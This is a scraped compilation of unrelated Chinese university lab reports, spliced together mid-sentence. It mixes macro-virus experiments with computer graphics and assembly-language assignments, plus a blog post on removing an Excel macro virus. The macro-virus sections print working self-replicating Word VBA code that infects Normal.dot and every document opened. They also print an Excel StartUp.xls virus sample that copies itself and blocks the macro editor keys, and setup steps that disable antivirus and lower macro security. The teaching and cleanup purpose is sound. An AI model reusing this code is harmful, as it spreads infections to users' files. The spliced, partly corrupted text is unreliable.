东华大学计算机病毒课实验六宏病毒实验报告.doc

计算机病毒实验报告

姓名：

学号:

老师：

日期：

一. 实验目的

Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。

二. 实验内容

1. macro virus中的内容

2. 信安实验平台--->计算机病毒篇 ---->计算机宏病毒

3. 结合杀毒软件如诺顿、卡巴斯基等，观察病毒查杀现象

三. 实验环境

1. macro virus

硬件设备：局域网，终端PC机。

系统软件：Windows系列操作系统

支撑软件：Word 2003

软件设置：关闭杀毒软；打开Word 2003，在工具→宏→安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问.

实验环境配置如下图所示：

受感染终端受感染

Word 文档

被感染终端

2.计算机宏病毒

硬件设备：部署 WIN2003 系统的PC 机一台

软件工具：Office word2007

四．实验步骤及截图

1.自我复制，感染word公用模板和当前文档

打开一个word文档，然后按Alt+F11调用宏编写窗口（工具宏Visual Basic宏编辑器）,在左侧的project—>Microsoft Word 对象ThisDocument中输入以上代码，保存，此时当前word文档就含有宏病毒

只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。

2.具有一定破坏性的宏

我们可以对上例中的恶意代码稍加修改，使其具有一定的破坏性（这里以著名宏病毒“台湾一号”的恶意代码部分为基础，为使其在word2003版本中运行，且降低破坏性，对源代码作适当修改）。

该病毒的效果如下：当打开被感染的word文档时，首先进行自我复制，感染word模板，然后检查日期，看是否是1日（即在每月的1日会发作），然后跳出一个对话框，要求用户进行一次心算游戏，这里只用四个小于10的数相乘，如果作者的计算正确，那么就会新建一个文档，跳出如下字幕：

何谓宏病毒

答案：我就是......

将系统日期设为XX月1号

如果答错，就会不停地刷屏，然后继续让你答题，否则跳出如下界面:

3. 计算机宏病毒

1). 新建Word 文档并打开

2). 调出开发工具,设置宏的等级，启用宏

3). 创建宏，命名AutoExec 编辑

4). 编辑宏，语法上注意VBA 版本保存

5). 关闭所有Word（必须）

6). 再次打开Word 文档，宏病毒爆发,弹出刚刚编写的msgbox 窗口

7). 启动任务管理器结束进程

搜索winword.exe 文件，并确定复制其位置

8). 启用CMD,定位winword 位置：

输入命令，用参数来打开安全模式winword.exe /a（执行此命令2 次）第一次安全模式

第二次新建文档

进行宏的打开设置来禁用宏

9). 搜索normal.dotm 等模板文件，若搜索不出东西，在高级选项中选中搜索隐藏文件及系统文件即可，并删除那个文件夹下的所有模板

10). 简易摆脱宏完成，重新打开word,没有被感染。

五. 总结与心得

Word宏病毒

Word宏病毒 1.实验目的(后果自负) Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。 2.实验所需条件和环境 硬件设备：局域网，终端PC机。 系统软件：Windows系列操作系统 支撑软件：Word 2003 软件设置：关闭杀毒软；打开Word 2003，在工具→宏→安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问 实验环境配置如下图所示： 受感染终端 受感染 Word文档 被感染终端宏病毒传播示意图 3.实验内容和分析 为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过

多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。 3.1. 例1 自我复制，感染word公用模板和当前文档 代码如下： 'Micro-Virus Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.SaveNormalPrompt = False Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If With Host If .Lines(1.1) <> "'Micro-Virus" Then .DeleteLines 1, .CountOfLines .InsertLines 1, Ourcode .ReplaceLine 2, "Sub Document_Close()" If ThisDocument = nomaltemplate Then .ReplaceLine 2, "Sub Document_Open()" ActiveDocument.SaveAs ActiveDocument.FullName End If End If End With MsgBox "MicroVirus by Content Security Lab" End Sub 打开一个word文档，然后按Alt+F11调用宏编写窗口（工具→宏→Visual Basic→宏编辑器）,在左侧的project—>Microsoft Word对象→ThisDocument中输入以上代码，保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。 3.1.1.代码解释 以上代码的基本执行流程如下： 1)进行必要的自我保护 Application.DisplayStatusBar = False Options.SaveNormalPrompt = False 高明的病毒编写者其自我保护将做得非常好，可以使word的一些工具栏失效，例如将

计算机图形学实验报告

《计算机图形学》实验报告姓名：郭子玉 学号：2012211632 班级：计算机12-2班 实验地点：逸夫楼507 实验时间：15.04.10 15.04.17

实验一 1 实验目的和要求 理解直线生成的原理；掌握典型直线生成算法；掌握步处理、分析实验数据的能力； 编程实现DDA 算法、Bresenham 中点算法；对于给定起点和终点的直线，分别调用DDA 算法和Bresenham 中点算法进行批量绘制，并记录两种算法的绘制时间；利用excel 等数据分析软件，将试验结果编制成表格，并绘制折线图比较两种算法的性能。 2 实验环境和工具 开发环境：Visual C++ 6.0 实验平台：Experiment_Frame_One （自制平台） 3 实验结果 3.1 程序流程图 （1）DDA 算法 是 否 否 是 是 开始 计算k ，b K<=1 x=x+1;y=y+k; 绘点 x<=X1 y<=Y1 绘点 y=y+1;x=x+1/k; 结束

（2）Mid_Bresenham 算法 是 否 否 是 是 是 否 是 否 开始 计算dx,dy dx>dy D=dx-2*dy 绘点 D<0 y=y+1；D = D + 2*dx - 2*dy; x=x+1; D = D - 2*dy; x=x+1; x

3.2程序代码 //-------------------------算法实现------------------------------// //绘制像素的函数DrawPixel(x, y); (1)DDA算法 void CExperiment_Frame_OneView::DDA(int X0, int Y0, int X1, int Y1) { //----------请实现DDA算法------------// float k, b; float d; k = float(Y1 - Y0)/float(X1 - X0); b = float(X1*Y0 - X0*Y1)/float(X1 - X0); if(fabs(k)<= 1) { if(X0 > X1) { int temp = X0; X0 = X1; X1 = temp; }

微机原理实验报告

西安交通大学实验报告 课程_微机与接口技术第页共页 系别__生物医学工程_________实验日期:年月日 专业班级_____组别_____交报告日期:年月日 姓名__ 学号__报告退发 ( 订正、重做 ) 同组人_教师审批签字 实验一汇编语言程序设计 一、实验目的 1、掌握Lab6000p实验教学系统基本操作； 2、掌握8088/8086汇编语言的基本语法结构； 3、熟悉8088/8086汇编语言程序设计基本方法 二、实验设备 装有emu8086软件的PC机 三、实验内容 1、有一个10字节的数组，其值分别是80H，03H，5AH，FFH，97H，64H，BBH，7FH，0FH，D8H。编程并显示结果： 如果数组是无符号数，求出最大值，并显示； 如果数组是有符号数，求出最大值，并显示。 2、将二进制数500H转换成二－十进制（BCD）码，并显示“500H的BCD是：” 3、将二－十进制码（BCD）7693转换成ASCII码，并显示“BCD码7693的ASCII是：” 4、两个长度均为100的内存块，先将内存块1全部写上88H，再将内存块1的内容移至内存块2。在移动的过程中，显示移动次数1，2 ，3…0AH…64H（16进制－ASCII码并显示子

程序） 5、键盘输入一个小写字母(a~z)，转换成大写字母 显示：请输入一个小写字母(a~z)： 转换后的大写字母是： 6、实现4字节无符号数加法程序，并显示结果，如99223344H + 99223344H = xxxxxxxxH 四、实验代码及结果 1.1、实验代码： DATA SEGMENT SZ DB 80H,03H,5AH,0FFH,97H,64H,0BBH,7FH,0FH,0D8H;存进数组 SHOW DB 'THE MAX IS: ','$' DATA ENDS CODE SEGMENT ASSUME CS:CODE,DS:DATA START: MOV AX,DATA ;把数据的基地址赋给DS MOV DS,AX MOV DX,OFFSET SHOW ;调用DOS显示字符串 MOV AH,09H INT 21H MOV SI ,OFFSET SZ ;数组的偏移地址赋给SI MOV CX,10 ;存进数组的长度给CX MOV DH,80H ;将数组的第一个数写进DH NEXT: MOV BL,[SI] ;将数组的第一个数写进BL CMP DH,BL ;比较DH和BL中数的到校 JAE NEXT1 ;如果DH中的数大于BL中，将跳转到NEXT1 MOV DH,BL ;如果DH中的数小于BL中，将BL中的数赋给DH NEXT1: INC SI ;偏移地址加1 LOOP NEXT;循环，CX自减一直到0，DH中存数组的最大值 ;接下来的程序是将将最大值DH在屏幕上显示输出 MOV BX,02H NEXT2: MOV CL,4 ROL DH,CL ;将DH循环右移四位

宏病毒分析及清除实验

实验五宏病毒分析及清除实验 姓名：xxx 学号：xxxxxxxx 日期：2014年4月26日 专业：计算机科学与技术 一、实验目的 ?了解“宏病毒”机理； ?掌握清除宏病毒的方法； ?掌握采用“宏”和脚本语言进行编程的技术。 二、实验环境 ?Windows2003操作系统； ?Office Word2003字处理软件。 三、实验内容 1．软件设置 关闭杀毒软件；打开Word字处理软件，在工具“宏”的“安全性”中，将“安全级”设置为低，在“可靠发行商”选项卡中，选择信任任何所有安装的加载项和模板，选择“信任visual basic项目的访问”。 注意：为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。 2．自我复制功能演示 打开一个word文档，然后按Alt+F11调用宏编写窗口（工具“宏”“Visual Basic宏编辑器”）,在左侧的“project—>Microsoft Word”对象“ThisDocument”中输入以下代码（Macro-1），保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。 完整代码如下：

清除宏病毒

清除宏病毒，名字是：StartUp.xls方法 --大白菜 文中图片都很小，看不清楚，可以用以下快捷方式：按住ctrl 向上滚动鼠标滑轮可以放大word，就可以看清楚图片了 病毒样本如下：（下面是宏病毒代码，电脑知识欠缺的，千万被乱动哦，小心弄巧成拙） Vba代码 =================宏病毒代码复制从下一行开始================= Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = https://www.wendangku.net/doc/6e18830739.html, ActiveWindow.Visible = False Workbooks("StartUp.xls").Save Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!cop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub cop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = False n$ = https://www.wendangku.net/doc/6e18830739.html,

计算机图形学实验报告 (2)

中南大学信息科学与工程学院 实验报告实验名称 实验地点科技楼四楼 实验日期2014年6月 指导教师 学生班级 学生姓名 学生学号 提交日期2014年6月

实验一Window图形编程基础 一、实验类型：验证型实验 二、实验目的 1、熟练使用实验主要开发平台VC6.0； 2、掌握如何在编译平台下编辑、编译、连接和运行一个简单的Windows图形应用程序； 3、掌握Window图形编程的基本方法； 4、学会使用基本绘图函数和Window GDI对象； 三、实验内容 创建基于MFC的Single Document应用程序（Win32应用程序也可，同学们可根据自己的喜好决定），程序可以实现以下要求： 1、用户可以通过菜单选择绘图颜色； 2、用户点击菜单选择绘图形状时，能在视图中绘制指定形状的图形； 四、实验要求与指导 1、建立名为“颜色”的菜单，该菜单下有四个菜单项：红、绿、蓝、黄。用户通过点击不同的菜单项，可以选择不同的颜色进行绘图。 2、建立名为“绘图”的菜单，该菜单下有三个菜单项：直线、曲线、矩形 其中“曲线”项有级联菜单，包括：圆、椭圆。 3、用户通过点击“绘图”中不同的菜单项，弹出对话框，让用户输入绘图位置，在指定位置进行绘图。

五、实验结果： 六、实验主要代码 1、画直线：CClientDC *m_pDC;再在OnDraw函数里给变量初始化m_pDC=new CClientDC(this); 在OnDraw函数中添加： m_pDC=new CClientDC(this); m_pDC->MoveTo(10,10); m_pDC->LineTo(100,100); m_pDC->SetPixel(100,200,RGB(0,0,0)); m_pDC->TextOut(100,100); 2、画圆： void CMyCG::LineDDA2(int xa, int ya, int xb, int yb, CDC *pDC) { int dx = xb - xa; int dy = yb - ya; int Steps, k; float xIncrement,yIncrement; float x = xa,y= ya; if(abs(dx)>abs(dy))

微机实验报告(1)

《微机实验》报告 实验名称 KeilC的使用与汇编语言上机操作 指导教师刘小英 专业班级中法1201 姓名肖洋学号 U3 联系电话 一、任务要求 1.掌握KeilC环境的使用 1）字节拆分、合并：调试程序，观察相关寄存器和单元的内容。 2）数据块填充：调试程序，观察相关寄存器和单元的内容。 2. 编写两个十六位数的加法程序。 有两个十六位无符号数，分别存放在从20H和30H开始的数据区中，低八位先存，高八 位在后，和存于R3（高八位）和R4（低八位），进位位存于R2。 二、设计思路 1.字节拆分、合并程序：利用汇编语言中的 XCHD 和 SWAP 两个语句来实现将八位二进制 数拆分为两个四位二进制数并分别存储于不同的存储空间的功能，BCD 码与 30H 相或（加 上 30H）得到 ASCII 码。将两个 ASCII 码和 0FH 相与（高四位清零）得到 BCD 码，利 用 SWAP 语句将高位数放至高四位，将高位数和低位数相或可实现字节的合并。 2.数据块填充程序：将 R0 用作计数器，DPTR 用作片外数据指针，A 作为原始数据来源， 依顺序在片外的存储单元内容填充数据。利用循环语句来减少程序长度，并控制填充单 元个数为片外 100H 个。（通过 R0 的进位控制） 3.两个十六位数加法程序：把第一个十六位无符号数的地八位和高八位分别存于 20H 和 21H 中，把第二个十六位无符号数的地八位和高八位分别存于 30H 和 31H 中，对 20H 和 30H 中的两个低八位进行 ADD 加法操作，结果存于 R4 中；然后对 21H 和 31H 中的两 个高八位进行 ADDC 带进位的加法操作，结果存于 R3 中.然后将累加器 A 清零，并和#00H

计算机图形学实验报告

目录

实验一直线的DDA算法 一、【实验目的】 1.掌握DDA算法的基本原理。 2.掌握DDA直线扫描转换算法。 3.深入了解直线扫描转换的编程思想。 二、【实验内容】 1.利用DDA的算法原理，编程实现对直线的扫描转换。 2.加强对DDA算法的理解和掌握。 三、【测试数据及其结果】 四、【实验源代码】 #include

#include #include #include GLsizei winWidth=500; GLsizei winHeight=500; void Initial(void) { glClearColor(1.0f,1.0f,1.0f,1.0f); glMatrixMode(GL_PROJECTION); gluOrtho2D(0.0,200.0,0.0,150.0); } void DDALine(int x0,int y0,int x1,int y1) { glColor3f(1.0,0.0,0.0); int dx,dy,epsl,k; float x,y,xIncre,yIncre; dx=x1-x0; dy=y1-y0; x=x0; y=y0; if(abs(dx)>abs(dy)) epsl=abs(dx); else epsl=abs(dy); xIncre=(float)dx/(float)epsl; yIncre=(float)dy/(float)epsl; for(k=0;k<=epsl;k++) { glPointSize(3); glBegin(GL_POINTS); glV ertex2i(int(x+0.5),(int)(y+0.5)); glEnd(); x+=xIncre; y+=yIncre; } } void Display(void) { glClear(GL_COLOR_BUFFER_BIT); DDALine(100,100,200,180); glFlush(); }

实验三 脚本病毒和宏病毒分析

实验三脚本病毒和宏病毒分析 一、实验目的 通过这项实验旨在使学生掌握Office下宏病毒的基本原理，主要包括它的传染机制、破坏机制以及怎样清除Office下的宏病毒。 二、实验环境 操作系统环境：Windows98/NT/2000/XP 编程环境：Office VBA 三、实验基础知识要求 Office VBA编程环境 四、实验任务 1．任务性质：验证性实验 2．任务描述：下面的示例中给出的是一个Word宏病毒的示例程序（只有传染模块），仔细阅读源程序，掌握Word宏病毒的传染过程。 3．任务步骤： （1）打开Word2000，新建一个文档名为“test”； （2）点击“工具－宏－宏”，在对话框“宏的位置”选择“test”，在宏名中输入“autoclose”，然后点击“创建”按钮； （3）在VBA编辑环境中输入示例程序中给出的代码，并保存，然后退出VBA； （4）点击“工具－宏－宏”，在对话框中点击“管理器”按钮，在管理器对话框中点击“宏方案项”标签；在宏方案项有效范围的“test.doc”中将“NewMacros”改名为“AOPEDMOK”； （5）点击“工具－宏－安全性”，在安全性对话框中的安全级标签中选择“低”，在可靠性来源标签中选择“信任对VB项目的访问”； （6）保存并关闭“test”文档； （7）新建一个文档test1，关闭后重新打开，观察test1是否被感染。 （8）清除此宏病毒，即要同时删除normal模板、所有活动模板、和染毒文件的autoclose 宏。 4．示例程序 Sub autoclose() ' autoclose Macro ' 宏在2005-8-26 由jingjd 创建 On Error Resume Next Application.DisplayAlerts = wdAlertsNone Application.EnableCancelKey = wdCancelDisabled Application.DisplayStatusBar = False 'Options.VirusProtection = False Options.SaveNormalPrompt = False Const VirusName = "AOPEDMOK" 'MsgBox ActiveDocument.VBProject.VBComponents.Item(2).Name 'MsgBox ActiveDocument.VBProject.VBComponents(2).Name Set Doc = ActiveDocument.VBProject.VBComponents Set Tmp = NormalTemplate.VBProject.VBComponents Const ExportSource = "E:\aopedmok.txt" For j = 1 To Doc.Count

微机实验报告

微机实验报告 标准化文件发布号：（9312-EUATWW-MWUB-WUNN-INNUL-DQQTY-

第一次实验 实验01 I/O端口地址译码实验 一、实验目的 掌握I/O地址译码电路的工作原理。 二、实验原理 1、实验电路如原理图所示，其中74LS74为D触发器，可直接使用实验台上数字电路实验区的D触发器，74LS138为地址译码器。译码输出端Y0～Y7在实验台上“I/O地址”输出端引出，每个输出端包含8个地址，Y0：280H～287H，Y1：288H～28FH，…… 当CPU执行I/O指令且地址在280H～2BFH范围内，译码器选中，必有一根译码线输出负脉冲。 例如：执行下面两条指令 MOV DX，290H OUT DX，AL（或IN AL，DX） Y2输出一个负脉冲，执行下面两条指令： MOV DX，2A0H OUT DX，AL（或IN AL，DX） Y4输出一个负脉冲。 (II型机) 2. 接线 II型机： I/O 地址/Y2(290H---297H) 接 D 触发器/CLK I/O 地址/Y4(2A0H---2A7H) 接 D 触发器/CD D 触发器/D 接 D 触发器/SD 接+5V D 触发器/Q 接逻辑笔或L7 I型机： I/O 地址/Y4 接 D 触发器/CLK I/O 地址/Y5 接 D 触发器/CD

…… 三、实验内容 利用负脉冲控制L7闪烁发光（亮、灭、亮、灭、……），时间间隔通过软件延时实现。 四、实验内容实现分析 分析实验连接图；说明实现该内容的原理；画出流程图。 五、实验程序 DATA SEGMENT OUTPORT1 EQU 290H OUTPORT2 EQU 2A0H DATA ENDS CODE SEGMENT ASSUME CS:CODE,DS:DATA

令人心烦的excel宏病毒终于清除了-推荐下载

令人心烦的excel宏病毒终于清除了!我如释重负地吁了口气，脑子一下子轻松了许多。你可能不知道，为了清除这个excel宏病毒，几天来，搞得我头昏脑胀。 大约两三个星期前，同事罗某告诉我，下面报上来的excel表，打开后出现了奇怪的现象：会自动打开一个book1的电子表格。他让我帮忙解决一下。我初步判断是宏病毒，默认打开的book1可能是excel的模板。我先“另存为”文件，找到book1的位置，删掉。同时把excel的宏安全性设置为高，禁止运行来历不明的宏，问题即解决了。 恰巧到下面去检查工作，某单位反映，电脑中病毒了，所以没有及时交表格。一问情况，与罗某讲的情况一样。我主动表示去“搞搞看”。但是情况并非如我猜想的那样。情况是：如果将宏的安全性设为非常高，禁用宏，会弹出一个警告：“出现了一个不能被禁止、又无法签署的Microsoft Excel 4.0 宏”，该表打不开；如果要打开这个表，必须降低excel宏安全性等级，将它设为中或低，即运行宏病毒，但又多出了一个book1表。即使将book1删除，仍然不行。面对这个新病毒，当时我不知该怎么办。 没过两天，罗某又来找我，说又出现了一种现象。我去看了，正与上次在下面检查时看到了excel 4.0 宏病毒一模一样。而且，下面有几个单位都说出现了宏病毒，上报来的表格中都有上面讲的问题。而且办公室有三台电脑都感染了excel 4.0 宏病毒。这么多的电脑感染了，引起了我的兴趣。

以前，我的电脑也多次中过病毒。我一般的做法就是上网查找 资料，把几篇文章介绍的方法结合起来，多试几次，几乎都能解决。可是这一次，情况完全不同。上网查了多次，讲宏病毒的文章特别多，但是介绍杀除方法的极少，而专门针对Microsoft Excel 4.0 宏病毒的只有一两篇提问的贴子，所介绍的方法就两样，一是在Excel 2003中禁止宏，二是用杀毒软件。第一种禁止是不行的，第二种杀毒软件我用了小红伞、360安全卫士，没查出病毒。 除此之外，还有一种临时救急的方法是：打开病毒表格，复制，再新建一个表格，选择性粘贴，只选值，最后保存。这个办法虽然行，但是面对那么多有宏病毒的表格，一个一个打开、复制、选择 性粘贴是不现实的。怎么办呢？ 接下来，我的思路是选择一种不支持excel宏的电子表格软件，这 样也许就把宏病毒过滤了。我试验过的软件有：wps office 2003 到最新的2010版，Ashampoo Office 2010，OpenOffice 3.2，永中Office 2009。它们都提示发现了宏，有的说不支持，有的说可以禁用，重新保存后宏病毒仍然存在，要么再打开时软件死机。 但是试验中发现微软Office 2007 / 2010 Beta 可以打开表格，只是在菜单栏提示“禁止了宏”，不影响操作。然而，现在基层单 位的电脑配置都比较低，安装不了Office 2007 / 2010 Beta，再说Office 2007 / 2010 Beta的菜单怪怪的，很多人不习惯。最重要的是，这并没有从根本上解决问题，宏病毒依然在表格文件里。 有个单位的人对我说，他们请来了电脑公司人员，几个小青年，把

2020年东华大学计算机病毒课实验六宏病毒实验报告.pdf

计算机病毒实验报告 姓名： 学号: 老师： 日期：

一. 实验目的 Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。 二. 实验内容 1. macro virus中的内容 2. 信安实验平台--->计算机病毒篇 ---->计算机宏病毒 3. 结合杀毒软件如诺顿、卡巴斯基等，观察病毒查杀现象 三. 实验环境 1. macro virus 硬件设备：局域网，终端PC机。 系统软件：Windows系列操作系统 支撑软件：Word 2003 软件设置：关闭杀毒软；打开Word 2003，在工具→宏→安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问. 实验环境配置如下图所示：

受感染终端受感染 Word 文档 被感染终端 2.计算机宏病毒 硬件设备：部署 WIN2003 系统的PC 机一台 软件工具：Office word2007

四．实验步骤及截图 1.自我复制，感染word公用模板和当前文档 打开一个word文档，然后按Alt+F11调用宏编写窗口（工具宏Visual Basic宏编辑器）,在左侧的project—>Microsoft Word 对象ThisDocument中输入以上代码，保存，此时当前word文档就含有宏病毒 只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。

宏病毒实验报告

宏病毒实验报告 2 邹文敏 一、实验目的 通过运行计算机代码，更加深刻的理解计算机代码。对计算机代码有一个初步的认识。 加深对宏病毒的感性认识，宏病毒是感染数据文件word,office 等。 二、实验内容 运行自我复制，感染word公用模板和当前文档；具有一定破坏性的宏；清除宏病毒。 三、实验步骤 实验一： 将word文档中的开发者工具打开；word 中心→信任选项→宏设计将信任选项打开

运行第一个实验Visual Basic →normal →Microsoft→the document Project→microsoft word对象→the document复制如下代码：'APMP Private Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.VirusProtection = False Options.SaveNormalPrompt = False '以上都是基本的自我隐藏措施 MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines( 1, 20) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then _ Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule

计算机图形学实验报告

计算机图形学 实验报告 姓名：谢云飞 学号：20112497 班级：计算机科学与技术11-2班实验地点：逸夫楼507 实验时间：2014.03

实验1直线的生成 1实验目的和要求 理解直线生成的原理；掌握典型直线生成算法；掌握步处理、分析 实验数据的能力； 编程实现DDA算法、Bresenham中点算法；对于给定起点和终点的 直线，分别调用DDA算法和Bresenham中点算法进行批量绘制，并记 录两种算法的绘制时间；利用excel等数据分析软件，将试验结果编 制成表格，并绘制折线图比较两种算法的性能。 2实验环境和工具 开发环境：Visual C++ 6.0 实验平台：Experiment_Frame_One（自制平台）。 本实验提供名为 Experiment_Frame_One的平台，该平台提供基本 绘制、设置、输入功能，学生在此基础上实现DDA算法和Mid_Bresenham 算法，并进行分析。 ?平台界面：如错误！未找到引用源。所示 ?设置：通过view->setting菜单进入，如错误！未找到引 用源。所示 ?输入：通过view->input…菜单进入.如错误！未找到引用 源。所示 ?实现算法： ◆DDA算法：void CExperiment_Frame_OneView::DDA(int X0, int Y0, int X1, int Y1) Mid_Bresenham法：void CExperiment_Frame_OneView::Mid_Bresenham(int X0, int Y0, int X1, int Y1)

3实验结果 3.1程序流程图 1）DDA算法流程图：开始 定义两点坐标差dx，dy，以及epsl，计数k=0，描绘点坐标x,y，x增 量xIncre，y增量yIncre ↓ 输入两点坐标x1,y1,x0,y0 ↓ dx=x1-x0,dy=y1-y0; ＿＿＿＿＿＿＿＿＿↓＿＿＿＿＿＿＿＿＿ ↓↓ 若|dx|>|dy| 反之 epsl=|dx| epsl=|dy| ↓＿＿＿＿＿＿＿＿...＿＿＿＿＿＿＿＿↓ ↓ xIncre=dx/epsl; yIncre=dy/epsl ↓ 填充(强制整形)(x+0.5,y+0.5); ↓←←←← 横坐标x+xIncre; 纵坐标y+yIncre; ↓↑ 若k<=epsl →→→k++ ↓ 结束 2）Mid_Bresenham算法流程图开始 ↓ 定义整形dx,dy,判断值d,以及UpIncre,DownIncre,填充点x,y ↓ 输入x0,y0,x1,y1 ＿＿＿＿＿＿↓＿＿＿＿＿＿ ↓↓ 若x0>x1 反之 x=x1;x1=x0;x0=x; x=x0;

东华大学微机实验报告答案(软件)

目录 实验一DEBUG的启动及其基本命令的使用实验二内存操作数及寻址方法 实验三汇编语言程序的调试与运行 实验四查表程序设计 实验五系统功能调用 实验六分支程序设计 实验七循环程序设计 实验八子程序设计 实验九综合程序设计 实验心得体会 参考文献

实验一 DEBUG的启动及其基本命令的使用 源程序：（指导书中给出） DA TA SEGMENT STRING1 DB 'Move the cursor backward' STRING2 DB 'Move the cursor backward' MESS1 DB 'Match.',13,10,'$' MESS2 DB 'No Match.',13,10,'$' DA TA ENDS STACK SEGMENT STACK DB 40 DUP (?) STACK ENDS PROGNAM SEGMENT ASSUME CS:PROGNAM,DS:DA TA,ES:DA TA,SS:STACK MAIN PROC FAR START: PUSH DS XOR AX,AX PUSH AX MOV AX,DATA MOV DS,AX MOV ES,AX MOV AX,STACK MOV SS,AX LEA SI,STRING1 LEA DI,STRING2 CLD MOV CX,25 REPZ CMPSB JZ MA TCH LEA DX,MESS2 JMP SHORT DISP MATCH: LEA DX,MESS1 DISP: MOV AH,09h INT 21H RET MAIN ENDP PROGNAM ENDS END START 运行结果：

word宏恶意代码实验

计算机宏病毒分析 一、实验目的 ?了解“宏病毒”机理； ?掌握清除宏病毒的方法； ?掌握采用“宏”和脚本语言进行编程的技术。 二、实验环境 ?Windows 7 64位旗舰版 ?Office Word2010字处理软件。 三、实验要求 ?宏的编写； ?理解宏病毒的作用机制。 四、实验步骤： 1．软件设置 关闭杀毒软件；打开Word字处理软件，在工具“宏”的“安全性”中，将“安全级”设置为低，在“可靠发行商”选项卡中，选择信任任何所有安装的加载项和模板，选择“信任visual basic项目的访问”。 注意：为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。 2．自我复制功能演示 打开一个word文档，然后按Alt+F11调用宏编写窗口（工具“宏”“Visual Basic宏编辑器”）,在左侧的“project—>Microsoft Word”对象“ThisDocument”中输入以下代码（Macro-1），保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word 文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。 完整代码如下： 'Macro-1：Micro-Virus

GF宏病毒

西安邮电大学 通信与信息工程学院 网络攻防实验报告 专业班级： 学生姓名： 学号(班内序号): 2014 年 5 月 28 日 —————————————————————————— 装 订 线———————————————————————————————— 报告份数：

